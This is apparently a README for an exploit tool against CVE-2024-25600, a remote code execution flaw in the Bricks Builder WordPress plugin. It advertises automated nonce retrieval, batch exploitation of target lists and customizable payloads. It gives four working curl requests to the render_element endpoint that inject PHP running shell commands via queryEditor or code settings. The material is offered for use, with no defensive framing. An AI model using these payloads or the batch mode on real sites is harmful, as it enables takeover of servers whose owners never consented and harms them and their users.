🛠 Description:
This tool exploits CVE-2024-25600, a critical Remote Code Execution (RCE) vulnerability in Bricks Builder for WordPress. It automates exploitation by retrieving nonces and sending malicious requests to execute arbitrary commands.
🔹 Features:
✅ Interactive & batch exploitation 🎮
✅ Customizable payloads (generic, carousel, container, code) 🎯
✅ RCE confirmation for valid targets ✔️
📌 Usage:
🎮 Command Single Test Exploit python :
python3 exploit.py -u <URL>
📋 Batch Mode:
python3 exploit.py -l <file_path>.txt
🛑 Use --only-rce to filter only successful RCEs.
🧰 Custom Payload:
python exploit.py -u <URL> --payload-type <generic|carousel|container|code>
💀 Proof of Concept (PoC) Commands:
🚀 First PoC (Container Element)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
🎯 Second PoC (Carousel Element)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
🔍 Third PoC (Loop Element Exploit)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": "1",
"loopElement": {
"settings": {
"query": {
"useQueryEditor": "",
"queryEditor": "throw new Exception(`id`);"
}
}
}
}'
💀 Fourth PoC (Code Execution - Older Versions)
curl -k -X POST "http://[HOST]/index.php?rest_route=/bricks/v1/render_element" \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "code",
"settings": {
"executeCode": "true",
"code": "<?php throw new Exception(`id`);?>"
}
}
}'